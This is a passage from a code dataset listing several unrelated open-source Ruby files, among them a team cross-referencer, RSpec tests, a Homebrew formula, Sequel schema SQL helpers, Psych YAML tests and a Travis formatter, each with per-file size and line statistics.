hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
216e2a8f59393b45339841532da10e2745151794
| 5,484 |
# @author Mike Bland ([email protected])
require_relative 'api'
require_relative 'canonicalizer'
require_relative 'cross_reference_data'
require_relative 'name_canonicalizer'
require 'lambda_map_reduce'
module TeamApi
# Builds cross-references between data sets.
class CrossReferencer
TEAM_FIELDS = %w(name last_name first_name full_name self)
PROJECT_FIELDS = %w(name full_name self)
WORKING_GROUP_FIELDS = %w(name full_name self)
GUILD_FIELDS = %w(name full_name self)
TAG_CATEGORIES = %w(skills interests)
TAG_XREF_FIELDS = %w(name slug self)
# Build cross-references between data sets.
# +site_data+:: Jekyll +site.data+ object
def self.build_xrefs(site)
team, projects, working_groups, guilds = create_xref_data site
projects.create_xrefs team
name_xrefs = create_name_xrefs team
[working_groups, guilds].each do |grouplet|
grouplet.create_xrefs team, source_to_target_field: 'leads',
alternate_names: name_xrefs
grouplet.create_xrefs team, source_to_target_field: 'members',
alternate_names: name_xrefs
end
xref_tags_and_team_members site, TAG_CATEGORIES, team
xref_locations site.data, team, [projects, working_groups, guilds]
end
def self.create_xref_data(site)
[CrossReferenceData.new(site, 'team', TEAM_FIELDS),
CrossReferenceData.new(site, 'projects', PROJECT_FIELDS),
CrossReferenceData.new(site, 'working-groups', WORKING_GROUP_FIELDS),
CrossReferenceData.new(site, 'guilds', GUILD_FIELDS),
]
end
private_class_method :create_xref_data
def self.create_name_xrefs(team)
name_xrefs = {}
team.data.each do |member|
name_xrefs[member.last['deprecated_name']] =
member.last['name'] if member.last['deprecated_name']
end
name_xrefs
end
def self.xref_tags_and_team_members(site, tag_categories, team_xref)
team = (site.data['team'] || {})
tag_categories.each do |category|
xrefs = create_tag_xrefs(site, team.values, category, team_xref)
next if xrefs.empty?
site.data[category] = xrefs
replace_item_tags_with_xrefs category, xrefs, team.values
end
end
def self.replace_item_tags_with_xrefs(tag_category, tag_xrefs, items)
items.each do |item|
(item[tag_category] || []).map! do |tag|
tag_xrefs[tag].select { |field| TAG_XREF_FIELDS.include? field }
end
end
end
# Generates a Hash of { tag => cross-reference } generated from the tag
# `category` Arrays from each element of `items`.
#
# For example:
# TEAM = {
# 'mbland' => {
# 'name' => 'mbland', 'full_name' => 'Mike Bland',
# 'skills' => ['C++', 'Python'] },
# 'arowla' => {
# 'name' => 'arowla', 'full_name' => 'Alison Rowland',
# 'skills' => ['Python'] },
# }
# TEAM_XREF = CrossReferenceData.new site, 'team', ['name', 'full_name']
# create_tag_xrefs site, TEAM, 'skills', TEAM_XREF
#
# will produce:
# {'C++' => {
# 'name' => 'C++',
# 'slug' => 'c++',
# 'self' => 'https://.../skills/c++',
# 'members' => [{ 'name' => 'mbland', 'full_name' => 'Mike Bland' }],
# },
#
# 'Python' => {
# 'name' => 'Python',
# 'slug' => 'python',
# 'self' => 'https://.../skills/python',
# 'members' => [
# { 'name' => 'mbland', 'full_name' => 'Mike Bland' },
# { 'name' => 'arowla', 'full_name' => 'Alison Rowland' },
# ],
# },
# }
def self.create_tag_xrefs(site, items, category, xref_data)
items_to_tags = lambda do |item|
item_xref = xref_data.item_to_xref item
item[category].map { |tag| [tag, item_xref] } unless item[category].nil?
end
create_tag_xrefs = lambda do |tag, item_xrefs|
[tag, tag_xref(site, category, tag, item_xrefs)]
end
LambdaMapReduce.map_reduce(items, items_to_tags, create_tag_xrefs).to_h
end
def self.tag_xref(site, category, tag, members)
category_slug = Canonicalizer.canonicalize category
tag_slug = Canonicalizer.canonicalize tag
{ 'name' => tag,
'slug' => tag_slug,
'self' => File.join(Api.baseurl(site), category_slug, tag_slug),
'members' => NameCanonicalizer.sort_by_last_name(members || []),
}
end
def self.group_names_to_team_xrefs(team, collection_xrefs)
collection_xrefs.map do |xref|
xrefs = team.flat_map { |i| i[xref.collection_name] }.compact.uniq
[xref.collection_name, xrefs] unless xrefs.empty?
end.compact.to_h
end
# Produces an array of locations containing cross references to team
# members and all projects, working groups, guilds, etc. associated with
# each team member. All team member cross-references must already exist.
def self.xref_locations(site_data, team_xref, collection_xrefs)
location_xrefs = site_data['team'].values.group_by { |i| i['location'] }
.map do |location_code, team|
[location_code,
{
'team' => team.map { |member| team_xref.item_to_xref member },
}.merge(group_names_to_team_xrefs(team, collection_xrefs)),
] unless location_code.nil?
end
HashJoiner.deep_merge site_data['locations'], location_xrefs.compact.to_h
end
end
end
| 36.078947 | 80 | 0.630015 |
f72c1ba6c7ef6c364da17fc0bc360cc3e84c967a
| 126 |
json.array!(@users_gyms) do |users_gym|
json.extract! users_gym, :id
json.url users_gym_url(users_gym, format: :json)
end
| 25.2 | 50 | 0.746032 |
e298f00ad0b42e6eca9b67ebdcf6a6aa3650e28a
| 6,901 |
#-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2018 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
describe ProjectsHelper, type: :helper do
include ApplicationHelper
include ProjectsHelper
before do
User.delete_all
Version.delete_all
Project.delete_all
set_language_if_valid('en')
User.current = nil
end
let(:test_project) { FactoryBot.create :valid_project }
describe 'a version' do
let(:version) { FactoryBot.create :version, project: test_project }
it 'can be formatted' do
expect(format_version_name(version)).to eq("#{test_project.name} - #{version.name}")
end
it 'can be formatted within a project' do
@project = test_project
expect(format_version_name(version)).to eq(version.name)
end
it 'does not create a link, without permission' do
expect(link_to_version(version)).to eq("#{test_project.name} - #{version.name}")
end
describe 'with a valid user' do
let(:user) { FactoryBot.create :user, member_in_project: test_project }
before do login_as(user) end
it 'generates a link' do
expect(link_to_version(version)).to eq("<a href=\"/versions/#{version.id}\">#{test_project.name} - #{version.name}</a>")
end
it 'generates a link within a project' do
@project = test_project
expect(link_to_version(version)).to eq("<a href=\"/versions/#{version.id}\">#{version.name}</a>")
end
end
describe 'when generating options-tags' do
it 'generates nothing without a version' do
expect(version_options_for_select([])).to be_empty
end
it 'generates an option tag' do
expect(version_options_for_select([], version)).to eq("<option selected=\"selected\" value=\"#{version.id}\">#{version.name}</option>")
end
end
end
describe 'a system version' do
let(:version) { FactoryBot.create :version, project: test_project, sharing: 'system' }
it 'can be formatted' do
expect(format_version_name(version)).to eq("#{test_project.name} - #{version.name}")
end
end
describe 'an invalid version' do
let(:version) { Object }
it 'does not generate a link' do
expect(link_to_version(Object)).to be_empty
end
end
describe '#projects_with_level' do
let(:root) do
stub_descendant_of
end
def stub_descendant_of(*ancestors)
wp = FactoryBot.build_stubbed(:project)
allow(wp)
.to receive(:is_descendant_of?)
.and_return(false)
ancestors.each do |ancestor|
allow(wp)
.to receive(:is_descendant_of?)
.with(ancestor)
.and_return(true)
end
wp
end
let(:child1) { stub_descendant_of(root) }
let(:grandchild1) { stub_descendant_of(root, child1) }
let(:grandchild2) { stub_descendant_of(root, child1) }
let(:grandgrandchild1) { stub_descendant_of(root, child1, grandchild2) }
let(:child2) { stub_descendant_of(root) }
context 'when ordered by hierarchy' do
let(:projects) do
[root,
child1,
grandchild1,
grandchild2,
grandgrandchild1,
child2]
end
it 'returns the projects in the provided order with the appropriate levels' do
expect { |b| helper.projects_with_level(projects, &b) }
.to yield_successive_args [root, 0],
[child1, 1],
[grandchild1, 2],
[grandchild2, 2],
[grandgrandchild1, 3],
[child2, 1]
end
end
context 'when ordered by arbitrarily' do
let(:projects) do
[grandchild1,
child1,
grandchild2,
grandgrandchild1,
child2,
root]
end
it 'returns the projects in the provided order with the appropriate levels' do
expect { |b| helper.projects_with_level(projects, &b) }
.to yield_successive_args [grandchild1, 0],
[child1, 0],
[grandchild2, 1],
[grandgrandchild1, 2],
[child2, 0],
[root, 0]
end
end
end
describe '#projects_level_list_json' do
subject { helper.projects_level_list_json(projects).to_json }
let(:projects) { [] }
describe 'with no project available' do
it 'renders an empty projects document' do
is_expected.to have_json_size(0).at_path('projects')
end
end
describe 'with some projects available' do
let(:projects) do
p1 = FactoryBot.build(:project, name: 'P1')
# a result from Project.project_level_list
[{ project: p1,
level: 0 },
{ project: FactoryBot.build(:project, name: 'P2', parent: p1),
level: 1 },
{ project: FactoryBot.build(:project, name: 'P3'),
level: 0 }]
end
it 'renders a projects document with the size of 3 of type array' do
is_expected.to have_json_size(3).at_path('projects')
end
it 'renders all three projects' do
is_expected.to be_json_eql('P1'.to_json).at_path('projects/0/name')
is_expected.to be_json_eql('P2'.to_json).at_path('projects/1/name')
is_expected.to be_json_eql('P3'.to_json).at_path('projects/2/name')
end
it 'renders the project levels' do
is_expected.to be_json_eql(0.to_json).at_path('projects/0/level')
is_expected.to be_json_eql(1.to_json).at_path('projects/1/level')
is_expected.to be_json_eql(0.to_json).at_path('projects/2/level')
end
end
end
end
| 32.097674 | 143 | 0.629619 |
33bc3b6212cdf67e05a37743bbc6585f1076f285
| 222 |
require "spec_helper"
RSpec.describe TailboardViewTool do
it "has a version number" do
expect(TailboardViewTool::VERSION).not_to be nil
end
it "does something useful" do
expect(false).to eq(true)
end
end
| 18.5 | 52 | 0.734234 |
acbfed89a69fca05ba80fc3043be3944881ab832
| 1,270 |
class Libmtp < Formula
desc "Implementation of Microsoft's Media Transfer Protocol (MTP)"
homepage "https://libmtp.sourceforge.io/"
url "https://downloads.sourceforge.net/project/libmtp/libmtp/1.1.18/libmtp-1.1.18.tar.gz"
sha256 "7280fe50c044c818a06667f45eabca884deab3193caa8682e0b581e847a281f0"
license "LGPL-2.1"
livecheck do
url :stable
end
bottle do
sha256 cellar: :any, arm64_big_sur: "4af12c090f3214200d4a37b9511c1fc1ba0269b40f26c0e9c45c4dbfe2c64474"
sha256 cellar: :any, big_sur: "5ebeb1696d5c7af72cb4a14f905dbde2cd871334ea392e7e8ff0305159c09aa1"
sha256 cellar: :any, catalina: "9b305e731b8d8608b688bb5c8bb98192d4879eb944fd4b08c09daadf367b68fc"
sha256 cellar: :any, mojave: "e4c497e80277170743a4ff8ddde06687a01f3afb053088b921b8399796f630ae"
sha256 cellar: :any, high_sierra: "704cd1e718e42dc9284ca020a11c1788d8a222cb8a4ca939d6b289cd17cf86ad"
end
depends_on "pkg-config" => :build
depends_on "libusb-compat"
def install
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--disable-mtpz"
system "make", "install"
end
test do
assert_match version.to_s, shell_output("#{bin}/mtp-getfile")
end
end
| 37.352941 | 106 | 0.731496 |
f8a423f08d772431b14ca48f62588fff4d5d4931
| 731 |
require 'studio_game/berserk_player'
module StudioGame
describe BerserkPlayer do
before do
$stdout = StringIO.new
@initial_health = 50
@player = BerserkPlayer.new("berserker", @initial_health)
end
it "does not go berserk when w00ted up to 5 times" do
1.upto(5) { @player.w00t }
expect(@player.berserker?).to be false
end
it "goes berserk when w00ted more than 5 times" do
1.upto(6) { @player.w00t }
expect(@player.berserker?).to be true
end
it "gets w00ted instead of blammed when it's gone berserk" do
1.upto(6) { @player.w00t }
1.upto(2) { @player.blam }
expect(@player.health).to eq(@initial_health + (8 * 15))
end
end
end
| 22.151515 | 65 | 0.634747 |
6af140b6c09009517d6532d185657f227fb64c68
| 2,898 |
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Security::Mgmt::V2015_06_01_preview
module Models
#
# Describes the allowed inbound and outbound traffic of an Azure resource
#
class ConnectableResource
include MsRestAzure
# @return [String] The Azure resource id
attr_accessor :id
# @return [Array<ConnectedResource>] The list of Azure resources that the
# resource has inbound allowed connection from
attr_accessor :inbound_connected_resources
# @return [Array<ConnectedResource>] The list of Azure resources that the
# resource has outbound allowed connection to
attr_accessor :outbound_connected_resources
#
# Mapper for ConnectableResource class as Ruby Hash.
# This will be used for serialization/deserialization.
#
def self.mapper()
{
client_side_validation: true,
required: false,
serialized_name: 'ConnectableResource',
type: {
name: 'Composite',
class_name: 'ConnectableResource',
model_properties: {
id: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'id',
type: {
name: 'String'
}
},
inbound_connected_resources: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'inboundConnectedResources',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ConnectedResourceElementType',
type: {
name: 'Composite',
class_name: 'ConnectedResource'
}
}
}
},
outbound_connected_resources: {
client_side_validation: true,
required: false,
read_only: true,
serialized_name: 'outboundConnectedResources',
type: {
name: 'Sequence',
element: {
client_side_validation: true,
required: false,
serialized_name: 'ConnectedResourceElementType',
type: {
name: 'Composite',
class_name: 'ConnectedResource'
}
}
}
}
}
}
}
end
end
end
end
| 31.846154 | 79 | 0.503796 |
6235f45f139b0e2b13336678e58c9ae6e1f4b21d
| 1,402 |
# coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'regit/version'
Gem::Specification.new do |spec|
spec.name = "regit"
spec.version = Regit::VERSION
spec.authors = ["Frank Matranga"]
spec.email = ["[email protected]"]
spec.summary = %q{Discord bot for school servers.}
spec.description = %q{A Discord bot written in Ruby to create/manage school servers.}
spec.homepage = "https://github.com/Apexal/regit"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org. To allow pushes either set the 'allowed_push_host'
# to allow pushing to a single host or delete this section to allow pushing to any host.
if spec.respond_to?(:metadata)
spec.metadata['allowed_push_host'] = "TODO: Set to 'http://mygemserver.com'"
else
raise "RubyGems 2.0 or newer is required to protect against " \
"public gem pushes."
end
spec.files = `git ls-files -z`.split("\x0").reject do |f|
f.match(%r{^(test|spec|features)/})
end
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.13"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency "minitest", "~> 5.0"
end
| 37.891892 | 96 | 0.664765 |
ff6edc358527386b20967270c710b55e0a563118
| 483 |
cask :v1 => 'charles' do
version '3.11.1'
sha256 'cdbacc5372851fe69613b676eaf0639dc7e7f82f321479f32efa6dcbecfa6913'
url "http://www.charlesproxy.com/assets/release/#{version}/charles-proxy-#{version}.dmg"
name 'Charles'
homepage 'http://www.charlesproxy.com/'
license :commercial
app 'Charles.app'
zap :delete => [
'~/Library/Application Support/Charles',
'~/Library/Preferences/com.xk72.charles.config',
]
end
| 28.411765 | 90 | 0.654244 |
2134b1ce9dbf2e8abf8a4c2be895399c1bd6693e
| 77 |
RouterVisualizer::Engine.routes.draw do
root to: 'visualizer#visualize'
end
| 25.666667 | 39 | 0.805195 |
e95abb6ea09739dc4dea98d0268c995a081c31a4
| 62 |
# frozen_string_literal: true
module Admin::SharesHelper
end
| 12.4 | 29 | 0.822581 |
bbeb34024eaa5599e200dfb9314ebebb32d05f88
| 40 |
module Chickout
VERSION = "0.0.1"
end
| 10 | 19 | 0.675 |
62ee2f855abfec9e3e4a726c43004b1eaf74e130
| 206 |
module Twilio
module REST
class Conference < InstanceResource
def initialize(uri, client, params={})
super uri, client, params
resource :participants
end
end
end
end
| 18.727273 | 44 | 0.645631 |
ac1b2dafe7779801e45aef21951acdaa3d0ba97b
| 1,029 |
# frozen_string_literal: true
require "rails_helper"
RSpec.describe BudgetXmlPresenter do
describe "#financial_year" do
context "when the financial_year is blank" do
it "returns nil for the start and end dates" do
budget = build(:budget, financial_year: "")
expect(described_class.new(budget).period_start_date).to be_nil
expect(described_class.new(budget).period_end_date).to be_nil
end
end
context "when the financial_year exists" do
it "returns IATI-formatted dates" do
budget = build(:budget, financial_year: 2020)
expect(described_class.new(budget).period_start_date).to eq(Date.parse("2020-04-01").strftime("%Y-%m-%d"))
expect(described_class.new(budget).period_end_date).to eq(Date.parse("2021-03-31").strftime("%Y-%m-%d"))
end
end
end
describe "#value" do
it "returns the value as a string" do
budget = build(:budget, value: 21.01)
expect(described_class.new(budget).value).to eq("21.01")
end
end
end
| 33.193548 | 114 | 0.685131 |
f7e56cbfd52dd04deec5fcf6b6e2c89adaa118d6
| 1,554 |
require File.dirname(__FILE__) + '/../spec_helper.rb'
describe RequestLogAnalyzer, 'when harvesting like munin-plugins-rails the YAML output' do
before(:each) do
cleanup_temp_files!
run("#{log_fixture(:rails_1x)} --dump #{temp_output_file(:yaml)}")
@rla = YAML::load(File.read(temp_output_file(:yaml)))
end
after(:each) do
cleanup_temp_files!
end
it "should contain database times" do
@rla["Database time"].each do |item|
item[1][:min].should_not be_nil
item[1][:max].should_not be_nil
item[1][:hits].should_not be_nil
item[1][:sum].should_not be_nil
end
end
it "should contain request times" do
@rla["Request duration"].each do |item|
item[1][:min].should_not be_nil
item[1][:max].should_not be_nil
item[1][:hits].should_not be_nil
item[1][:sum].should_not be_nil
end
end
it "should contain failed requests" do
@rla.keys.should include("Failed requests")
end
it "should contain Process blockers" do
@rla.keys.should include("Process blockers (> 1 sec duration)")
end
it "should contain HTTP Methods" do
@rla["HTTP methods"]["GET"].should_not be_nil
end
it "should contain HTTP Methods" do
@rla["HTTP methods"]["GET"].should_not be_nil
end
it "should contain view rendering times" do
@rla["View rendering time"].each do |item|
item[1][:min].should_not be_nil
item[1][:max].should_not be_nil
item[1][:hits].should_not be_nil
item[1][:sum].should_not be_nil
end
end
end
| 26.338983 | 90 | 0.664093 |
ed5d8abcf9c9252e187df2c0e9be76d072d9fd5c
| 11,737 |
module Sequel
module Schema
module SQL
AUTOINCREMENT = 'AUTOINCREMENT'.freeze
CASCADE = 'CASCADE'.freeze
COMMA_SEPARATOR = ', '.freeze
NO_ACTION = 'NO ACTION'.freeze
NOT_NULL = ' NOT NULL'.freeze
NULL = ' NULL'.freeze
PRIMARY_KEY = ' PRIMARY KEY'.freeze
RESTRICT = 'RESTRICT'.freeze
SET_DEFAULT = 'SET DEFAULT'.freeze
SET_NULL = 'SET NULL'.freeze
TYPES = Hash.new {|h, k| k}
TYPES[:double] = 'double precision'
UNDERSCORE = '_'.freeze
UNIQUE = ' UNIQUE'.freeze
UNSIGNED = ' UNSIGNED'.freeze
# The SQL to execute to modify the DDL for the given table name. op
# should be one of the operations returned by the AlterTableGenerator.
def alter_table_sql(table, op)
quoted_name = quote_identifier(op[:name]) if op[:name]
alter_table_op = case op[:op]
when :add_column
"ADD COLUMN #{column_definition_sql(op)}"
when :drop_column
"DROP COLUMN #{quoted_name}"
when :rename_column
"RENAME COLUMN #{quoted_name} TO #{quote_identifier(op[:new_name])}"
when :set_column_type
"ALTER COLUMN #{quoted_name} TYPE #{op[:type]}"
when :set_column_default
"ALTER COLUMN #{quoted_name} SET DEFAULT #{literal(op[:default])}"
when :set_column_null
"ALTER COLUMN #{quoted_name} #{op[:null] ? 'DROP' : 'SET'} NOT NULL"
when :add_index
return index_definition_sql(table, op)
when :drop_index
return drop_index_sql(table, op)
when :add_constraint
"ADD #{constraint_definition_sql(op)}"
when :drop_constraint
"DROP CONSTRAINT #{quoted_name}"
else
raise Error, "Unsupported ALTER TABLE operation"
end
"ALTER TABLE #{quote_schema_table(table)} #{alter_table_op}"
end
# Array of SQL DDL modification statements for the given table,
# corresponding to the DDL changes specified by the operations.
def alter_table_sql_list(table, operations)
operations.map{|op| alter_table_sql(table, op)}
end
# The SQL string specify the autoincrement property, generally used by
# primary keys.
def auto_increment_sql
AUTOINCREMENT
end
# SQL DDL fragment containing the column creation SQL for the given column.
def column_definition_sql(column)
return constraint_definition_sql(column) if column[:type] == :check
sql = "#{quote_identifier(column[:name])} #{type_literal(column)}"
sql << UNIQUE if column[:unique]
sql << NOT_NULL if column[:null] == false
sql << NULL if column[:null] == true
sql << " DEFAULT #{literal(column[:default])}" if column.include?(:default)
sql << PRIMARY_KEY if column[:primary_key]
sql << " #{auto_increment_sql}" if column[:auto_increment]
sql << column_references_sql(column) if column[:table]
sql
end
# SQL DDL fragment containing the column creation
# SQL for all given columns, used instead a CREATE TABLE block.
def column_list_sql(columns)
columns.map{|c| column_definition_sql(c)}.join(COMMA_SEPARATOR)
end
# SQL DDL fragment for column foreign key references
def column_references_sql(column)
sql = " REFERENCES #{quote_schema_table(column[:table])}"
sql << "(#{Array(column[:key]).map{|x| quote_identifier(x)}.join(COMMA_SEPARATOR)})" if column[:key]
sql << " ON DELETE #{on_delete_clause(column[:on_delete])}" if column[:on_delete]
sql << " ON UPDATE #{on_delete_clause(column[:on_update])}" if column[:on_update]
sql
end
# SQL DDL fragment specifying a constraint on a table.
def constraint_definition_sql(constraint)
sql = constraint[:name] ? "CONSTRAINT #{quote_identifier(constraint[:name])} " : ""
case constraint[:constraint_type]
when :primary_key
sql << "PRIMARY KEY #{literal(constraint[:columns])}"
when :foreign_key
sql << "FOREIGN KEY #{literal(constraint[:columns])}"
sql << column_references_sql(constraint)
when :unique
sql << "UNIQUE #{literal(constraint[:columns])}"
else
check = constraint[:check]
sql << "CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}"
end
sql
end
# Array of SQL DDL statements, the first for creating a table with the given
# name and column specifications, and the others for specifying indexes on
# the table.
def create_table_sql_list(name, columns, indexes = nil)
sql = ["CREATE TABLE #{quote_schema_table(name)} (#{column_list_sql(columns)})"]
sql.concat(index_list_sql_list(name, indexes)) if indexes && !indexes.empty?
sql
end
# Default index name for the table and columns, may be too long
# for certain databases.
def default_index_name(table_name, columns)
schema, table = schema_and_table(table_name)
"#{"#{schema}_" if schema and schema != default_schema}#{table}_#{columns.join(UNDERSCORE)}_index"
end
# The SQL to drop an index for the table.
def drop_index_sql(table, op)
"DROP INDEX #{quote_identifier(op[:name] || default_index_name(table, op[:columns]))}"
end
# SQL DDL statement to drop the table with the given name.
def drop_table_sql(name)
"DROP TABLE #{quote_schema_table(name)}"
end
# Proxy the filter_expr call to the dataset, used for creating constraints.
def filter_expr(*args, &block)
schema_utility_dataset.literal(schema_utility_dataset.send(:filter_expr, *args, &block))
end
# SQL DDL statement for creating an index for the table with the given name
# and index specifications.
def index_definition_sql(table_name, index)
index_name = index[:name] || default_index_name(table_name, index[:columns])
if index[:type]
raise Error, "Index types are not supported for this database"
elsif index[:where]
raise Error, "Partial indexes are not supported for this database"
else
"CREATE #{'UNIQUE ' if index[:unique]}INDEX #{quote_identifier(index_name)} ON #{quote_identifier(table_name)} #{literal(index[:columns])}"
end
end
# Array of SQL DDL statements, one for each index specification,
# for the given table.
def index_list_sql_list(table_name, indexes)
indexes.map{|i| index_definition_sql(table_name, i)}
end
# Proxy the literal call to the dataset, used for default values.
def literal(v)
schema_utility_dataset.literal(v)
end
# SQL DDL ON DELETE fragment to use, based on the given action.
# The following actions are recognized:
#
# * :cascade - Delete rows referencing this row.
# * :no_action (default) - Raise an error if other rows reference this
# row, allow deferring of the integrity check.
# * :restrict - Raise an error if other rows reference this row,
# but do not allow deferring the integrity check.
# * :set_default - Set columns referencing this row to their default value.
# * :set_null - Set columns referencing this row to NULL.
def on_delete_clause(action)
case action
when :restrict
RESTRICT
when :cascade
CASCADE
when :set_null
SET_NULL
when :set_default
SET_DEFAULT
else
NO_ACTION
end
end
def quote_schema_table(table)
schema, table = schema_and_table(table)
"#{"#{quote_identifier(schema)}." if schema}#{quote_identifier(table)}"
end
# Proxy the quote_identifier method to the dataset, used for quoting tables and columns.
def quote_identifier(v)
schema_utility_dataset.quote_identifier(v)
end
# SQL DDL statement for renaming a table.
def rename_table_sql(name, new_name)
"ALTER TABLE #{quote_schema_table(name)} RENAME TO #{quote_schema_table(new_name)}"
end
# Parse the schema from the database using the SQL standard INFORMATION_SCHEMA.
# If the table_name is not given, returns the schema for all tables as a hash.
# If the table_name is given, returns the schema for a single table as an
# array with all members being arrays of length 2. Available options are:
#
# * :reload - Get fresh information from the database, instead of using
# cached information. If table_name is blank, :reload should be used
# unless you are sure that schema has not been called before with a
# table_name, otherwise you may only getting the schemas for tables
# that have been requested explicitly.
def schema(table_name = nil, opts={})
table_name = table_name.to_sym if table_name
if opts[:reload] && @schemas
if table_name
@schemas.delete(table_name)
else
@schemas = nil
end
end
if @schemas
if table_name
return @schemas[table_name] if @schemas[table_name]
else
return @schemas
end
end
if table_name
@schemas ||= {}
if respond_to?(:schema_parse_table, true)
@schemas[table_name] ||= schema_parse_table(table_name, opts)
else
raise Error, 'schema parsing is not implemented on this database'
end
else
if respond_to?(:schema_parse_tables, true)
@schemas = schema_parse_tables(opts)
elsif respond_to?(:schema_parse_table, true) and respond_to?(:tables, true)
tables.each{|t| schema(t, opts)}
@schemas
else
raise Error, 'schema parsing is not implemented on this database'
end
end
end
# The dataset to use for proxying certain schema methods.
def schema_utility_dataset
@schema_utility_dataset ||= dataset
end
private
# Match the database's column type to a ruby type via a
# regular expression. The following ruby types are supported:
# integer, string, date, datetime, boolean, and float.
def schema_column_type(db_type)
case db_type
when /\Atinyint/
Sequel.convert_tinyint_to_bool ? :boolean : :integer
when /\A(int(eger)?|bigint|smallint)/
:integer
when /\A(character( varying)?|varchar|text)/
:string
when /\Adate\z/
:date
when /\A(datetime|timestamp( with(out)? time zone)?)\z/
:datetime
when /\Atime( with(out)? time zone)?\z/
:time
when "boolean"
:boolean
when /\A(real|float|double( precision)?)\z/
:float
when /\A(numeric(\(\d+,\d+\))?|decimal|money)\z/
:decimal
when "bytea"
:blob
end
end
# SQL fragment specifying the type of a given column.
def type_literal(column)
column[:size] ||= 255 if column[:type] == :varchar
elements = column[:size] || column[:elements]
"#{type_literal_base(column)}#{literal(Array(elements)) if elements}#{UNSIGNED if column[:unsigned]}"
end
# SQL fragment specifying the base type of a given column,
# without the size or elements.
def type_literal_base(column)
TYPES[column[:type]]
end
end
end
end
| 38.864238 | 149 | 0.622987 |
e2a312901a639951732a4da2688f4c81ccef2eef
| 1,989 |
require_relative 'helper'
module Psych
class TestHash < TestCase
class X < Hash
end
class HashWithCustomInit < Hash
attr_reader :obj
def initialize(obj)
@obj = obj
end
end
class HashWithCustomInitNoIvar < Hash
def initialize(obj)
# *shrug*
end
end
def setup
super
@hash = { :a => 'b' }
end
def test_referenced_hash_with_ivar
a = [1,2,3,4,5]
t1 = [HashWithCustomInit.new(a)]
t1 << t1.first
assert_cycle t1
end
def test_custom_initialized
a = [1,2,3,4,5]
t1 = HashWithCustomInit.new(a)
t2 = Psych.load(Psych.dump(t1))
assert_equal t1, t2
assert_cycle t1
end
def test_custom_initialize_no_ivar
t1 = HashWithCustomInitNoIvar.new(nil)
t2 = Psych.load(Psych.dump(t1))
assert_equal t1, t2
assert_cycle t1
end
def test_hash_subclass_with_ivars
x = X.new
x[:a] = 'b'
x.instance_variable_set :@foo, 'bar'
dup = Psych.load Psych.dump x
assert_cycle x
assert_equal 'bar', dup.instance_variable_get(:@foo)
assert_equal X, dup.class
end
def test_load_with_class_syck_compatibility
hash = Psych.load "--- !ruby/object:Hash\n:user_id: 7\n:username: Lucas\n"
assert_equal({ user_id: 7, username: 'Lucas'}, hash)
end
def test_empty_subclass
assert_match "!ruby/hash:#{X}", Psych.dump(X.new)
x = Psych.load Psych.dump X.new
assert_equal X, x.class
end
def test_map
x = Psych.load "--- !map:#{X} { }\n"
assert_equal X, x.class
end
def test_self_referential
@hash['self'] = @hash
assert_cycle(@hash)
end
def test_cycles
assert_cycle(@hash)
end
def test_ref_append
hash = Psych.load(<<-eoyml)
---
foo: &foo
hello: world
bar:
<<: *foo
eoyml
assert_equal({"foo"=>{"hello"=>"world"}, "bar"=>{"hello"=>"world"}}, hash)
end
end
end
| 20.936842 | 80 | 0.598793 |
d506197bd93c99f66ed8c7c7b76032c5943cec05
| 1,578 |
require 'time'
module Travis
module Tools
class Formatter
DAY = 24 * 60 * 60
TIME_FORMAT = "%Y-%m-%d %H:%M:%S"
CONFIG_KEYS = ['rvm', 'gemfile', 'env', 'jdk', 'otp_release', 'php', 'node_js', 'perl', 'python', 'scala', 'compiler', 'os']
def duration(seconds, suffix = nil)
return "none" if seconds.nil?
seconds = (Time.now - seconds).to_i if seconds.is_a? Time
output = []
minutes, seconds = seconds.divmod(60)
hours, minutes = minutes.divmod(60)
output << "#{hours } hrs" if hours > 0
output << "#{minutes} min" if minutes > 0
output << "#{seconds} sec" if seconds > 0 or output.empty?
output << suffix if suffix
output.join(" ")
end
def file_size(input, human = true)
return "#{input} B" unless human
format = "B"
iec = %w[KiB MiB GiB TiB PiB EiB ZiB YiB]
while human and input > 512 and iec.any?
input /= 1024.0
format = iec.shift
end
input = input.round(2) if input.is_a? Float
"#{input} #{format}"
end
def time(time)
return "not yet" if time.nil? # or time > Time.now
#return duration(time, "ago") if Time.now - time < DAY
time.localtime.strftime(TIME_FORMAT)
end
def job_config(config)
output = []
config.each_pair do |key, value|
output << "#{key}: #{value}" if CONFIG_KEYS.include? key
end
output.join(", ")
end
end
end
end
| 31.56 | 130 | 0.529785 |
1d4c4292e5588dadc020f9ac54ce94f5334b71c6
| 961 |
#
# Author:: Panagiotis Papadomitsos (<[email protected]>)
#
